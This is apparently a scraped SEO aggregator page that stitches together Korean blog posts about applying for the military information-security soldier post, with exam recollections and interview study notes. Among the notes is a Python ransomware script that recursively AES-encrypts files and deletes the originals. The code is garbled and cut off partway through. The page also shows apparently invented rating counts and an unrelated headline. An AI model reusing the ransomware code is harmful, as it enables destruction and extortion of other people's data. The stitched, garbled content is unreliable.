You are looking for information, articles, knowledge about the topic nail salons open on sunday near me 정보 보호 병 on Google, you do not find the information you need! Here are the best content compiled and compiled by the Chewathai27.com/to team, along with other related topics such as: 정보 보호 병 정보보호병 후기, 정보보호병 하는일, 정보보호병 자대배치, 정보보호병 디시, 공군 정보보호병 생활, 정보보호병 2022, 해군 정보보호병 후기, 정보보호병 해군
육군 정보보호병 후기
- Article author: velog.io
- Reviews from users: 9747 Ratings
- Top rated: 4.2
- Lowest rated: 1
- Summary of article content: Articles about 육군 정보보호병 후기 육군 정보보호병에 지원해서 합격하게 되었습니다!저는 한림대학교 소프트웨어융합대학에 재학중이며 정보보안이나 해킹과는 거리가 좀 있는 사람 … …
- Most searched keywords: Whether you are looking for 육군 정보보호병 후기 육군 정보보호병에 지원해서 합격하게 되었습니다!저는 한림대학교 소프트웨어융합대학에 재학중이며 정보보안이나 해킹과는 거리가 좀 있는 사람 … 육군 정보보호병에 지원해서 합격하게 되었습니다!저는 한림대학교 소프트웨어융합대학에 재학중이며 정보보안이나 해킹과는 거리가 좀 있는 사람인데도 어느정도 상식을 쌓으니 합격시켜주었네요. 관련 지식은 네트워크관리사 2급이랑 정보처리기능사를 취득하며 어느정도 접해봤고, 그 외
- Table of Contents:
BLOG
- Article author: alltime-it.tistory.com
- Reviews from users: 39562 Ratings
- Top rated: 3.1
- Lowest rated: 1
- Summary of article content: Articles about BLOG [INFORMATION GUARD] 정보보호병 1차 합격 정보보호병 1차 합격하기까지 필자가 계획하던 군입대는 1학년 마치고 바로이다. …
- Most searched keywords: Whether you are looking for BLOG [INFORMATION GUARD] 정보보호병 1차 합격 정보보호병 1차 합격하기까지 필자가 계획하던 군입대는 1학년 마치고 바로이다. [INFORMATION GUARD] 정보보호병 1차 합격 정보보호병 1차 합격하기까지 필자가 계획하던 군입대는 1학년 마치고 바로이다. 필자의 첫 목표는 해병대였지만, 불합격,, 이후로 코로나라 군대 가기 힘든 것은 파악하..
- Table of Contents:
태그
관련글
댓글0
최근글
인기글
전체 방문자
티스토리툴바
2021.04.01 육군 정보보호병 지원 1차 :: filime
- Article author: filime.tistory.com
- Reviews from users: 36101 Ratings
- Top rated: 4.8
- Lowest rated: 1
- Summary of article content: Articles about 2021.04.01 육군 정보보호병 지원 1차 :: filime 작년 기준으로 내 점수를 매기면 40점으로 간당간당하게 합격할 수 있는 커트라인이다. 그래서 이제는 한 30~32점 이상은 되어야 합격 커트라고 볼 수 … …
- Most searched keywords: Whether you are looking for 2021.04.01 육군 정보보호병 지원 1차 :: filime 작년 기준으로 내 점수를 매기면 40점으로 간당간당하게 합격할 수 있는 커트라인이다. 그래서 이제는 한 30~32점 이상은 되어야 합격 커트라고 볼 수 … 2021.04.01 세종대학교 정보보호학과 2학년 1학기 재학 중에 평생 과제를 해결하고 싶어 정보보호병으로 지원했다. 서류 점수 점수 분배는 이렇게 되어있고 내가 사전 조사해본 결과 작년에는 면접이 30점이었..
- Table of Contents:
서류 점수
총점수 및 경쟁률
TAG
관련글 관련글 더보기
인기포스트
티스토리툴바
육군 정보보호병 2차 최종 합격 (2021.4월 지원) : 네이버 블로그
- Article author: blog.naver.com
- Reviews from users: 3639 Ratings
- Top rated: 3.3
- Lowest rated: 1
- Summary of article content: Articles about 육군 정보보호병 2차 최종 합격 (2021.4월 지원) : 네이버 블로그 정보보호병 2차 필기 시험은 따로 정해진 시험 범위가 존재하지 않고 족보가 있다 해도 계속 변형되기에 공부하기가 상당히 까다로웠다. . 족보라고 해도 … …
- Most searched keywords: Whether you are looking for 육군 정보보호병 2차 최종 합격 (2021.4월 지원) : 네이버 블로그 정보보호병 2차 필기 시험은 따로 정해진 시험 범위가 존재하지 않고 족보가 있다 해도 계속 변형되기에 공부하기가 상당히 까다로웠다. . 족보라고 해도 …
- Table of Contents:
악성코드가 포함되어 있는 파일입니다
작성자 이외의 방문자에게는 이용이 제한되었습니다
‘정보보안 기타/정보보호병 후기’ 카테고리의 글 목록 :: C.L Programming
- Article author: majeulsa.tistory.com
- Reviews from users: 41931 Ratings
- Top rated: 3.8
- Lowest rated: 1
- Summary of article content: Articles about ‘정보보안 기타/정보보호병 후기’ 카테고리의 글 목록 :: C.L Programming 2021.10.18일자로 공군 정보보호병 면접을 보고 왔습니다. 관련 학과인 건양대학교 사이버보안공학과를 재학중이라서 전공 관련 추가점수를 받았으며, … …
- Most searched keywords: Whether you are looking for ‘정보보안 기타/정보보호병 후기’ 카테고리의 글 목록 :: C.L Programming 2021.10.18일자로 공군 정보보호병 면접을 보고 왔습니다. 관련 학과인 건양대학교 사이버보안공학과를 재학중이라서 전공 관련 추가점수를 받았으며, … ‘정보보안 기타/정보보호병 후기’ 카테고리의 글 목록,
- Table of Contents:
See more articles in the same category here: Top 673 tips update new.
육군 정보보호병 후기
육군 정보보호병에 지원해서 합격하게 되었습니다!
저는 소프트웨어융합대학에 재학중이며 정보보안이나 해킹과는 거리가 좀 있는 사람인데도 어느정도 상식을 쌓으니 합격시켜주었네요.
관련 지식은 네트워크관리사 2급이랑 정보처리기능사를 취득하며 어느정도 접해봤고, 그 외 문제를 좀 풀어보며 익히려고 노력했습니다.
합격 수기를 간단히 적어볼까 합니다.
과정
서류심사 (1차) 필기시험 (2차) 면접 (2차)
위와 같은 점수로 합격을 했습니다.
1차지원 같은 경우는 서류심사를 통해서 뽑고 2차는 대전충남지방병무청에 가서 필기시험과 면접 후에 최종 결과를 통보받을수 있었습니다.
서류에 관해서는 제가 딱히 드릴 말씀이 없습니다. 병무청 홈페이지에 들어가보시면 몇몇 자격증이 가선점을 주는데 저같은 경우는 동급 추가점수인 네트워크관리사나 정보처리기능사에 가산점이 붙고 다니는 학과에 추가점수를 받아 서류 34점으로 무난히 합격했습니다.
필기시험하고 면접을 준비한다고 상당히 애먹었는데 만약 정보보호병을 준비하시는 분들이 제 글을 본다면 조금 더 수월하게 준비할 수 있지 않을까 싶습니다.
필기 준비
필기는 무조건 정보보안기사 기출 풀어봐야 합니다.
보안기사에서 모든 문제가 다나옵니다.
기수가 틀려지면 모르겠지만 저같은 경우는 시험지에 10문제가 나왔고, 모두 보안 기사에서 한번씩은 본 문제들이여서 풀 수 있었습니다.
제가 보안기사 보면서 본 사이트 참조해드릴테니 다 보는건 현실적으로 무리가 있고 200문제 내지 300문제만 눈으로 훑어도 큰 도움이 되리라 확신합니다.
1~14회 보안기사 기출문제
다른 문제집 볼 필요 없이 계속 저것만 훑어보세요. 필기문제는 정말 저기서 갈라집니다.
평균적인 합격점수로 추론해봤을때 3~4문제 정도 맞추면 얼추 커트라인 이상으로 무난히 통과가 가능한 것 같습니다.
면접 준비
면접을 제가 참 고민을 많이 했습니다.
인터넷에 올라온 후기같은걸 보면 막 해킹기법 워터링 홀이 뭐냐, 브루트포스 어택을 아냐 이런씩으로 물어보시던데 이걸 그럼 다 외워가야하냐 생각이 막막했습니다.
면접은 총 두번에 걸쳐서 보는데, 한분은 군무원인거 같았고 한분은 대위이신것 같더라고요.
군무원 분은 만약 그룹간의 마찰이 생기면 어떻게 대처할 것인가, 또는 밤샘 근무할 일이 많을텐데 어떻게 대처할 것인가 이런 형식적인 질문을 하셨고 다수결에 따라서 어떻게 어떻게 할 것이다 라고 에둘러 대답하니 어찌저찌 넘어간 것 같습니다.
개인적인 생각으론 면접후에 핵심적인 질문은 대위님이 많이 하신 것 같았습니다.
대위님도 평범한 질문을 꽤 하셨는데, 그외에 제가 좀 핵심적으로 느낀 걸 꼽자면
로그를 아냐 아는 정보보안 장비가 있냐
이정도였습니다.
저는 막 복잡한 해킹기법 이야기하실줄 알고 준비를 꽤 많이 해갔는데 아쉽더라고요.
여기서 정말 임팩트있게 느낀건 아는 보안장비가 있냐는 질문이 나왔을 때 IPS랑 IDS를 말씀드리니 정말 눈이 틀려진 것 같았습니다. 간략히 설명하니 만족하셨던 것 같구요.
면접전에 공부한 이런 전문적인 지식을 내포하는게 핵심 포인트인 것 같습니다.
아래에 제가 면접 대비하며 정리해놓은 파일 기재할테니 참고하시면 좋을꺼같아요.
해킹 기법 정리
1.Syn/Ack Flood
코드출처: Normaltic
◉ client ack (클라이언트 데이터 보내기전 동기화 요청) ->server syn/ack(서버응답) -> client ack(클라이언트 응답)
◉ TCP접속을 성공시키기 위해 반드시 필요한 과정 – > 3way handshaking
◉ ack(응답)을 안보내니까 syn이 꽉차서 syn 백로그큐를 폭주시켜서 dinial of service 가 발생함
◉ FIN Flag를 이용한 4way handshaking 또한 존재
대응책
1.백로그큐 크기 늘림
2.신 쿠키 설정
3.방화벽에 임계치 설정
4.tcp 연결 과정 대기시간 줄임
DDOS 대응방안
◉ DOS공격이 맞는지 명확히 판단
◉ 형 파악 후 차단정책 근거 확보
◉ 차단정책 설정
◉ 공격대비/정책업데이트/좀비PC IP확보
◉ 막는법은 없고 서버 증설하거나 해당 ip를 서버에서 차단시킴 /서버 ip바꾸기/클라우드플레어
◉ 윈도우에서 iis(internet information service)에서 ip및 도메인 차단 들어가서 막기 시전
◉ 리눅스에서 root # route add -host [IP] reject
2.SQL Injection
Sql 질의문을 삽입하는 공격
◉ 정상 로그인
◉ 해커가 입력한 로그인
◉ where 절에서 and 조건은 or조건보다 선행되기 때문에 무조건 true값 리턴, 모든 데이터 출력되버림
◉ 대충 아이디 ~(SQL 질의문 추가)
◉ 정상적인 질의쿼리: select * from user where id=’[사용자ID]’
◉ 인젝션당한쿼리: select * from user where id=’[사용자ID]’~~~임의의 sql 구문
◉ blind/mass/union 등 다양한 변화형태 존재 blind->참거짓 리턴
◉ WAS(웹애플리케이션 서버) -> database
예: sql : {} 하나 사와
{} 빵
{} 빵 하나 사오고 건물 한채 계약해
DB에 임의의 SQL명령 실행(쉘까지 확보 가능)
DB의 데이터를 추출
인증 우회
DB 데이터 변조
◉ 악성 파일 업로드 가능 막는법: 쿼리와 관련된 코드를 죄다 필터링시켜서 시큐어 코딩
3.XSS Cross Site Scripting
진짜 간단히 말해서 이거.
대부분은 막아두지 근데 정말 보안 아예 안해둔 사이트는 안막아둠
보통은 이런씩으로 링크를 걸어서 알림창을 뜨게함
아스키코드로 위 실행명령을 변환시킨 뒤에 일부 웹서버는 필터링을 제대로 안해주므로 잘 통하는 경우가 있음
허점 즉, 취약점을 찾는 것이 중요함
워낙 변칙적이고 다 막기가 힘들어서 위험함
자바스크립트 형식으로 버튼/함수 응용가능
방지법
1.태그 써서 막기
2.필터링 등등..
xss 응용기법
◉ 칼리리눅스에서 xss를 응용한 BeEF 컨트롤 패널 등 사용가능
(browser exploitation framework project)
◉ 여기에 pretty theft 같은 기법이 있음( 홈페이지 똑같이 구현해서 가짜 홈페이지에 치게하고 로그따오는거)
4.RansomWare
import glob import os , random , struct from Cryptodome . Cipher import AES def encrypt_file ( key , in_filename , out_filename = None , chunksize = 64 * 1024 ) : if not out_filename : out_filename = in_filename + ‘.yankee’ iv = os . urandom ( 16 ) encryptor = AES . new ( key , AES . MODE_CBC , iv ) filesize = os . path . getsize ( in_filename ) with open ( in_filename , ‘rb’ ) as infile : with open ( out_filename , ‘wb’ ) as outfile : outfile . write ( struct . pack ( ‘
‘ + filename ) encrypt_file ( key , filename ) os . remove ( filename ) for filename in glob . iglob ( startPath , recursive = True ) : if ( os . path . isfile ( filename ) ) : fname , ext = os . path . splitext ( filename ) if ( ext == ‘.enc’ ) : print ( ‘Decrypting> ‘ + filename ) decrypt_file ( key , filename ) os . remove ( filename )5.WPA Crack
◉ 앞서 3 way handshake 가 세션을 연결하는 과정이었다면, 4 way handshake는 클라와 서버의 연결을 끊고 세션을 종료하는 과정임. 이 과정에서 해킹이 가능함
그 과정은 이러합니다.
◉ Fin wait -> close wait-> fin wait 2
◉ 여기서 time wait을 주는 이유는 Routing 지연이나 패킷 유실로 인한 재전송 등으로 인해 FIN패킷보다 늦게 도착하는 상황이 발생할 수 있기 때문
◉WPA란?
Wired Equivalent Privacy의 약자로 유선랜에 상당하는 Privacy를 제공하기 위한 알고리즘
◉ WEP를 보완하는 암호화 방식
WPA Version1, Vesion2가 있음
◉ 여기서 사용된 Aircrack-ng는 디텍터, 패킷 스니퍼, WEP와 [Wi-Fi Protected Aooo ccess|WPA]/WPA2-PSK 802.11 무선 LAN에 대한 크래커와 분석 도구가 탑재된 네트워크 소프트웨어이다.
IPS란?
침입 차단 시스템(侵入遮斷 – ,영어:Intrusion Prevention Systems (IPS), Intrusion Detection and Prevention Systems (IDPS)) 또는침입 방지 시스템은 외부네트워크로부터 내부 네트워크로 침입하는 네트워크패킷을 찾아 제어하는 기능을 가진소프트웨어또는하드웨어이다.
IBM Proventia, 윈스 Sniper IPS, Cisco 파이어파워, 티핑포인트 등
IDS란?
침입 탐지 시스템(Intrusion Detection System, IDS)은 일반적으로 시스템에 대한 원치 않는 조작을 탐지하여 준다. IDS는 매우 많은 종류들이 존재하며, 여기서는 그들 중 일부를 설명한다. 시스템에 대한 원치 않는 조작은 악의를 가진 숙련된해커또는 자동화된 툴을 사용하는스크립트 키디에 의한 공격의 형태로 행해질 수 있다
스노트나 브로같은게 ids 예
문제
클라이언트에서 서버로 쿠키를 보낼 때 사용하는 HTTP 헤더는?
-> set-cookie와 cookie 등의 선지가 있었다.
set-cookie, 중간에 개인정보 탈취등을 방지하기 위해 세션등이 사용됨 다음 중 전자상거래와 관련이 없는 것은?-> ebXML, SET, SSL, EMV가 선지였다.
ssl은 인터넷 데이터 암호화 기술 chmod 명령어의 특징이 아닌 것은?-> 파일과 디렉토리를 rename할 수 있다는 선지를 선택했다. HTTP 오류 코드와 그 뜻을 알맞게 짝지은 것이 아닌 것은?
-> 200, 403, 404, 500이 나왔다. 다음 중 입력값에 대한 검증 / 특수문자 처리를 하지 않은 것과 무관한 공격 기법은?
-> injection 기법 두세 종류와 ‘watering hole’이 나왔다. ‘watering hole’을 골랐다. watering hole : 워터링 홀 공격이란 공격대상이 자주 방문하는 홈페이지를 사전에 악성코드에 감염시킨 뒤 공격대상이 접속 할 때까지 잠복하면서 기다린다. 그리고 공격대상이 접속하면 비로서 공격을 시도하는 수법이다. 홈페이지에 접속하는 모든 사용자를 공격하기 때문에 접속하는 모든 사용자가 공격의 대상이 될 수 있다
◉ xss크로스사이트스크립트, 스크립트엔진 취약점과도 연관있음
리눅스 방화벽에서 ping에 대한 응답으로 ‘destination unreachable’을 리턴하기 위해 설정해야 하는 플래그는?
-> DENY, REJECT 등이 있었다. REJECT를 골랐다. 다음 화면은 어떤 명령어의 실행 결과인가? (ping 실행 화면)
-> 답이 ping이다 ㅋㅋ 다음 중 IPS에 대한 설명으로 올바르지 않은 것은? (그냥 IPS가 아니라 어플리케이션 뭐시기 IPS이었는데 기억이 안난다) 침해 단계의 심각성?에 따라 나열할 때, 빈칸에 들어갈 단어들은? (emergency에서 debug까지 나열되어 있었다.)
-> alert, info 등이 있었는데, 그냥 영어 할 줄만 알면 나열 가능하다
◉ 사고 전 준비 과정]→[사고 탐지]→[초기 대응]→[대응 전략 체계화]→[사고 조사]→[보고서 작성]→[해결]
침입이 있는데, 없다고 판단하는 경우는 뭐라고 하는가? (True/False Positive/Negative 중 선택)-> False Negative라고 답했는데, 맞을지 모르겠다.
◉ 1번
전자서명과 관련없는 프로토콜을 고르시오.
1. DSA
2. KCDSA
3. ECDSA
4. A5/3
=> 답 : 4
dsa가 digital signature algorithm 이므로 dsa붙은거 고르면된다.
◉ 2번
DB 보안으로서 적절하지 못한 자세는? (문제설명이 똑같지는 않지만 취지는 동일하다.)
1. 관리자를 최소한으로 만든다.
2. 로컬 계정으로 접속하는 것을 금지
3. Guest 계정으로 접속하는 것을 금지
4. 기억 안나는데 답은 아니였음
=> 답 : 2
로컬 계정으로 접속하는게 안되면 뭐 다 안되지
◉ 3번
SIEM에서 사용되는 프로토콜로 적절하지 못한 것은?
1. Qrader
2. Arcsight
3. SPLUNK
4. beStorm
=> 답 : 4 (정답은 기억 안나는데 나머지 보기는 틀린 보기임)
siem = sim(보안정보관리) + sem(보안이벤트관리)
◉ 4번
공개키와 대칭키 알고리즘을 사용하여 키교환을 하는 방식에서 제 3자가 해당 공개키를 인증할 수 있는 시스템은?
(문제설명이 똑같지는 않지만 취지는 동일하다.)
1. 키 분배 인증 센터
2. RSA ->공개키 암호시스템
3. Diffie Hellman
4. 기억 안남
=> 답 : 1
◉ 5번 문제 기억 안남
◉ 6번
파일 시스템 내에서 파일이나 디렉토리의 고유한 번호, 블록 정보 등이 담겨있는 파일은?
1. boot
2. data
3. i-node
4. 기억 안남
=> 답 : 3
◉ 7번
멀티 쓰레드나 멀티 프로세스에서 공유 자원을 여러 실행흐름이 접근하여 발생될 수 있는 취약점은?
1. buffer overflow 메모리 취약점 ->스택””은 해당버퍼에 할당된거보다 많이쓸때
2. Return to Library 라이브러리 함수 리턴
3. Race Condition ->상호배제,진행,한정대기
4. SQL Injection
=> 답 : 3
◉ 8번
웹 로그 파일에 기록되는 보기로 알맞지 않은 것을 고르시오.
1. IP 주소
2. 접속 시 Method
3. 접속 시 프로토콜
4. 접속 시 포트번호
=> 답 : 3 (정답이 정확하지는 않음 필자는 3번으로 적음)
◉ 9번
IDS가 수행되는 절차를 알맞게 배열한 보기를 고르시오.
=> 답 : [데이터 수집 -> 가공 -> 분석 -> 보고]
◉ 10번
TCP에서 4way HandShake의 연결 종료 과정에서 Seq와 ACK의 번호로 ㄱ, ㄴ, ㄷ, ㄹ에 알맞는 번호가 들어간 것을 고르시오.
=> 이 문제는 연결 종료 과정을 보여주면서 빈칸 기호와 번호가 일치하는 보기를 고르는 문제임. 답은 기억 안남
◉ strcpy 대신 strncpy를 사용하는 이유버퍼 오버플로우/scanf,getbyhostname등도 여기속함
◉ NMS가 확인할 수 없는 것호스트의 CPU 점유율
◉ 윈도우 공유 폴더 취약점(Null SessionIPC$
◉ TCP에서 클라이언트의 버퍼 오버플로우를 막기 위한 것흐름 제어
◉ crontab과 관련된 문제
◉ 사용자 인증 관련 문제최대 권한
◉ 다음 로그는 어떤 공격인가?랜드 공격(Land Attack)
◉ 디지털 포렌식에서 우선적으로 분석해야 하는 것레지스터
웹 대상으로 이루어지는 공격 시도를 막는 것웹 방화벽(WAF)
◉ 1. 파일 업로드 취약점을 묻는 문제 (단답식)
공격자는 서버 사이드 스크립트(PHP, JSP, .NET 등)을 이용하여 웹쉘(WebShell)을 제작
웹쉘(WebShell)은 원격에서 웹 서버를 제어하기 위한 목적으로 만들어졌으나, 지금은 웹쉘 = 악성코드라고 분류를 하여 안티 바이러스에서 탐지함
sql injection 과 다른점: 웹에서 노출되는 정보들을 하나씩 가져오는 sql injection 과 달리 파일 업로드 취약점은 웹쉘을 통해 시스템에 아예 침투하고 난 뒤 원하는 데이터들을 마음껏 가져오는 것
시큐어 코딩 – 소스코드 레벨 대응
◉ 2. 해시함수를 묻는 문제 (단답식)
임의의 길이를 갖는 임의의 데이터를 고정된 길이의 데이터로 매핑하는 함수를 말한다.
◉ 3. 메시지 인증코드를 묻는 문제 (단답식)
메시지 인증 코드(Message Authentication Code, 약칭 MAC)는메시지의 인증에 쓰이는 작은 크기의정보이다. MAC알고리즘은비밀 키를 입력받고, 임의-길이의 메시지를 인증한다.
◉ 4. 포맷 스트링 취약점을 묻는 문제 (답답식)
◉ 5. 운영체제 프로세스 상태 관련 문제 – 임계상태, 교착상태, 상호베재 등등 (객관식)
◉ 6. 포렌식 이미지 생성 프로그램을 묻는 문제 – nc, gz, tar, encase (객관식)
◉ 7. 로그 파일을 피해자 메일에 자동으로 전송하는 공격 프로그램을 묻는 문제 – 답 모름 ㅠㅠ (단답식)
◉ 8. VPN을 묻는 문제 (단답식)
◉ 9. OSI 7계층의 계층 중 설명에 대한 계층은 어느 계층인지 묻는 문제 (단답식)
면접준비
◉ CVE란 무엇입니까?
CVE(Common Vulnerabilities and Exposure)는 공개적으로 알려진 소프트웨어의 보안취약점을 가리키는 고유 표기를 뜻한
◉ APT 공격이 무엇입니까?
APT공격은 해커가 다양한 보안 위협을 만들어 특정 기업이나 조직의 네트워크에 지속적으로 가하는공격을 뜻한
◉ Zeroday공격이 무엇입니까?
제로 데이공격(또는 제로 데이 위협,Zero-DayAttack)은 컴퓨터 소프트웨어의 취약점을공격하는 기술적 위협으로, 해당 취약점에 대한 패치가 나오지 않은 시점에서 이루어지는공격을 말한다.
◉ 워러 크라이란 무엇입니까?
워너크라이(WannaCry) 또는워너크립트(WannaCrypt)[2],WanaCrypt0r 2.0는 2017년 5월 12일부터 등장한랜섬웨어멀웨어 툴이다. 2017년 5월 12일부터 대규모사이버 공격을 통해 널리 배포되었으며, 전세계 99개국의 컴퓨터 12만대 이상을 감염시켰다.[3][4]감염된 컴퓨터로는 20개의 언어로비트코인을 지급하면 풀어주겠다는 메시지를 띄웠다.
킬스위치 찾아냈고,방화벽이랑 인터넷 랜선꼽을때 유의하면 사전예방 가능
◉ 랜섬웨어란 무엇입니까?
랜섬웨어란 Ransom(몸값)과 Ware(제품)의 합성어로서 악성코드의 일종입니다. 해당 악성코드에 감염시컴퓨터 시스템에 접근이 제한되거나저장된 문서나 사진․동영상 파일이 암호화되어 사용할 수 없게 되며, 해커는 이에 대한 해제 대가로 금품을 요구합니다.
최근 이스라엘 보안 기업 만든 스파이웨어 페가수스가 애플뚫음
브루트 포스(무차별 대입 공격) 언급하며 그걸로도 몇백년 걸리는걸 뚫은게 대단하다고 생각함
기타 자료
TCP의 4-way Handshaking 과정
[STEP 1]클라이언트가 연결을 종료하겠다는 FIN플래그를 전송한다. 이때A클라이언트는 FIN-WAIT상태가 된다.
[STEP 2]B서버는 FIN플래그를 받고, 일단 확인메시지 ACK 보내고 자신의 통신이 끝날때까지 기다리는데 이 상태가
B서버의 CLOSE_WAIT상태다.
[STEP 3]연결을 종료할 준비가 되면, 연결해지를 위한 준비가 되었음을 알리기 위해 클라이언트에게 FIN플래그를 전송한다. 이때 B서버의 상태는 LAST-ACK이다.
[STEP 4]클라이언트는 해지준비가 되었다는 ACK를 확인했다는 메시지를 보낸다.
A클라이언트의 상태가 FIN-WAIT ->TIME-WAIT 으로 변경된다.
그런데 만약 “Server에서 FIN을 전송하기 전에 전송한 패킷이 Routing 지연이나 패킷 유실로 인한 재전송 등으로 인해 FIN패킷보다 늦게 도착하는 상황”이 발생한다면 어떻게 될까요?
Client에서 세션을 종료시킨 후 뒤늦게 도착하는 패킷이 있다면 이 패킷은 Drop되고 데이터는 유실될 것입니다.
A클라이언트는 이러한 현상에 대비하여 Client는 Server로부터 FIN을 수신하더라도 일정시간(디폴트 240초) 동안 세션을 남겨놓고 잉여 패킷을 기다리는 과정을 거치게 되는데이 과정을”TIME_WAIT”라고 합니다. 일정시간이 지나면, 세션을 만료하고 연결을 종료시키며,”CLOSE”상태로 변화합니다.
방화벽과 ips/ids 차이
ips/ids 차이
◉ 패킷
패킷의 구성요소
1) 헤더(Header)동기 신호 플래그, 전송지 주소, 목적지 주소, 순차 번호 등패킷에는 프로토콜의 다양한 정보들이 헤더에 기록되는데, 프로토콜에 따라 다름.
2) 데이터(Data)데이터 부분에는 실제로 전송될 내용이 있음.
3) 트레일러(Trailer)수신 측에서는 전송 중에 데이터가 손상되었는지 알 수 있음.
예) 전송 에러 검사 항목 CRC(Cyclic Redundancy Check)
OSI 7계층
Ids 침입탐지유형
◉ NIDS (네트워크 침입 감지 시스템)
◉ 호스트 침입 탐지 시스템 (HIDS)
SQL과 Blind SQL의 차이는?
◉ Sql인젝션은 쿼리를 삽입해 원하는 데이터를 한번에 얻어냄
◉ Blind sql인젝션은 쿼리가 참일때와 거짓일때의 반응으로만 데이터를 알아냄
Setuid가 뭔가요
◉ 리눅스 특수권한 중 하나로 루트유저 엑세스 파일에 일반유저가 접근하게끔 허가
◉ 8진수 4000이 비트
◉ Setgid는 8진수 2000
◉ 커널에 내장된 툴로써 패킷 필터링, connection tracking
iptables
john the ripper
브루트포스
리눅스 설정 파일/ 임시파일/ 물리적 장치
etc/tmp/dev
퍼온 정보도 많습니다
혹시 원작자이시거나 불편하신 점이 있다면 댓글에 적어주세요
정보보호병이 나름 정예병이나, SW개발병에 비하면 나름 문턱도 작고 준비만 열심히 한다면 충분히 시도해 볼만한 보직인 것 같습니다.
필자도 보안에 관련해서는 모르는 부분이 정말 많지만, 적당한 공부를 통해 합격할 수 있었네요.
아직 훈련소도 들어가보지 못했고 사령부에 배치받을지 사단급에 배치받을지도 모르지만,
아무런 생각없이 군생활 하는 것보다 특기를 살려서 하는 편이 훨씬 낫다는 확신이 듭니다.
겁내지 말고 도전해보면 뭐라도 주는것 같아요 ㅋㅋ
앞으로 정보보호병을 하며 얻게된 경험이나 일 또한 기밀을 제외하고 기재할 기회가 있길 바랍니다.
2021.04.01 육군 정보보호병 지원 1차
2021.04.01 세종대학교 정보보호학과 2학년 1학기 재학 중에 평생 과제를 해결하고 싶어 정보보호병으로 지원했다.
서류 점수
점수 분배는 이렇게 되어있고 내가 사전 조사해본 결과 작년에는 면접이 30점이었지만 올해는 40점으로 비중이 매우 커졌다.
정보보호학과나 정보보안, 해킹 방어와 같이 보안과 직접 관련된 과는 1순위이고 컴퓨터공학과나 전자공학 같이 관련 학과는 2순위 나머지는 비전공으로 분류된다.
나는 1순위이고 2년 재학 중이니 14점을 먹고 간다.
고교 출석률은 0일이므로 10점을 먹고 간다.
경력에서는 아직 대학생이고 BOB를 수료하지 않아서 얻을 수 있는 점수는 없다. 작년에는 KUSIS에 등록된 동아리에 가입되어 있으면 4점을 주고 기타 동아리에만 들어가도 1점을 주었는데 올해는 BOB 수료자만 6점을 주고 있어서 평균 점수가 내려가지 않을까 싶다.
자격증에서는 아무 자격증이 없으면 기본 10점을 주고 가장 자격등급이 높은 자격증 하나만 인정하여 점수를 준다. 리눅스 마스터 2급이 있지만 여기에는 해당되지 않는 것 같아 사본 조차 내지 않았고 그래서 10점을 받았다.
면접은 1차 서류 전형이 붙어야 면접을 볼 수 있고 20점은 구술 면접 20점은 필기시험으로 구성되어 있다. 작년에 비해 필기시험이 10점 더 높아져 비중이 매우 커졌으니 공부를 열심히 해야 될 것 같다.
총점수 및 경쟁률
내 졈수는 2년 재학 14점 + 고교 출석 10점 + 자격증 기본 10 점하여 총 34점이다.
올해 기준이 아닌 작년이나 다른 모집 때와 비교하면 평균 1차 서류 전형은 38 이상은 되어야 안전하게 합격이라고 하는데, 올해는 면접 점수의 비중이 커지고 대학교 재학 상황과 경력의 점수 분배가 달라져서 커트라인이 내려갈 것으로 예상된다. 작년 기준으로 내 점수를 매기면 40점으로 간당간당하게 합격할 수 있는 커트라인이다. 그래서 이제는 한 30~32점 이상은 되어야 합격 커트라고 볼 수 있겠다.
올해 경쟁률은 2.5:1로 내가 조사한 어느 경쟁률 보다도 가장 낮은 경쟁률인 것 같다. 보통 5:1에서 6:1 혹은 그 이상 정도가 되는데 2.5:1이면 절반 이하로 떨어졌으니 더 쉬울 수도(?) 있을 것 같다는 생각이 든다.
제발 한 번에 합격해서 이 영원한 숙제를 끝내버리고 싶다.
=======================================================
4.20 1차 결과가 나왔다.
배점은 내가 예상한 대로였고 놀랍게도 내 선발 순위가 매우 높았다는 것이다. 4점 차이로 약 29위가 차이나고 40명을 뽑는데 아무 스펙 없고 제1 지망 대학이었던 내가 51위나 하였으니 이제 문제풀이와 면접에 모든 게 달렸다는 것이다….. 정보보호 기사를 공부하고 가라는데, 참고해서 약 2주의 기간 동안 열심히 공부하고 준비해서 한 번에 붙어야겠다.
육군 정보보호병 2차 최종 합격 (2021.4월 지원)
육군 정보보호병 육군 정보보호병 2차 최종 합격 (2021.4월 지원) sungwhan4854 ・ URL 복사 본문 기타 기능 공유하기 신고하기 이번 시간에는 저번 시간에 작성했던 정보보호병 1차 합격에 이어 2차 즉 최종 합격에 대해 작성해볼 것이다. 일단 간단한 정보보호병 설명과 1,2차 배점 설명은 이전 글에서 설명했으니 궁금한 점이나 못보신 분들은 참고해서 보자. https://blog.naver.com/sungwhan4854/222370667825 육군 정보보호병 1차 서류 합격 (2021.4월 지원) 이번 시간에는 4월에 지원한 육군 정보보호병 1차 합격에 대해 작성해볼 것이다. 현재 시점에는 최종합격이… blog.naver.com 원활한 이해를 위해 2차 심사 배점표는 한 번더 올려놓기는 하겠다. [그림 1] 간단한 설명은 이전에 했으니 이번 글에서는 필기 시험은 어떤 문제가 나왔고 면접은 어떤 질문이 나왔는지와 같은 경험을 위주로 작성해볼 것이다. 1. 2차 일정 서류점수 34점을 통해 100명 중 46등으로 1차에 합격했고 [그림 2]과 같이 면접 일자와 시간 장소가 적혀져 있는 장문의 카톡을 병무청에서 받았다. [그림 2] 5월 6일 오후 1시로 날짜가 잡혀있었다. (아마 대부분 오후 1시로 잡힐 것이다.) 이전글에서 확인했듯이 2차 심사는 필기와 면접이 준비되어 있다. 그렇기에 오후 1시에 필기를 먼저 본 후 필기 시험이 끝나면 면접을 보는 방식으로 진행된다. 참고로 면접과 필기는 순서나 자리가 있지 않고 선착순으로 진행되는 방식이다. 대전 병무청에 도착하면 은행이나 병원 접수에서 뽑는 번호표를 뽑고 오후 1시 필기가 시작된다. 그리고 뽑은 번호 순서대로 면접이 진행되는 방식이다. (더 자세한 내용은 2. 필기, 3. 면접에 자세히 작성해 놓았다.) 일단 날짜가 잡혔으니 발표 당일 서대전으로 가는 KTX를 예약했다. 다행이 추석 시즌이 아니라서 KTX는 자리가 많았다. 이제 중요한건 시간이다. 필자도 대전에 가기전 다양한 후기를 찾아보며 준비를 했었다. 여러 후기를 찾아보면서 가장 공통적으로 볼 수 있는 멘트가 무조건 1~2시간 일찍 가라는 멘트였다. 1차를 2배수로 선발하기에 사람도 상당히 있어 오후 1시에 맞춰가면 선착순으로 보는 면접을 늦게 볼 수 도 있기 때문이다. 그렇기에 필자는 오전 10시 45분 